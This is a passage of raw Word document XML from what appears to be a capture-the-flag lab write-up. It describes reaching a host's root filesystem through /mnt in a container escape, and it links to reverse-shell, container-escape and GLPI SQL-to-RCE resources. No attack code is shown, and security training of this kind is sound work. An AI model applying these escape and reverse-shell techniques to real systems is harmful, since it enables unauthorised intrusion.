          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory, which corresponds to the host’s root filesystem, allowing direct interaction with the main system. We successfully retrieve the final piece of evidence inside </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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8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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5434013" cy="2264172"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="32"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434013" cy="2264172"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId28" w:type="default"/>
      <w:headerReference r:id="rId29" w:type="first"/>
      <w:headerReference r:id="rId30" w:type="even"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId33" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025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8E">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wswpkpg6kjox" w:id="5"/>
    <w:bookmarkEnd w:id="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-866773</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="19" name="image1.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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18F">
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:after="120" w:before="360" w:lineRule="auto"/>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190">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459842519685038pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image8.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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="18" name="image13.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image13.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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="3001873"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="17"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Help Desk</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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="3001873"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="17"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6667500" cy="3001873"/>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1"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8.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2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdk-team/CDK" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><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hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/266"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footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.lexfo.fr/glpi-sql-to-rce.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reverse-shell.sh/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reverse-shell.sh/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><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tiHeY0S901WGd3nZW85F78/zlw==">CgMxLjAyDmguMjNobHp6Ym5maXd3Mg5oLmFhYnFra3VseTZtZDIOaC5kZmk1c2g2eGtmNW4yDmguMnFub3VvbjY4dXVyMg5oLmt4YmtkOHJqaDF3YTIOaC53c3dwa3BnNmtqb3g4AHIhMXFPRG5zVllKdHByOXhCaVhrTER6WEtLaW5QVWtqYXBV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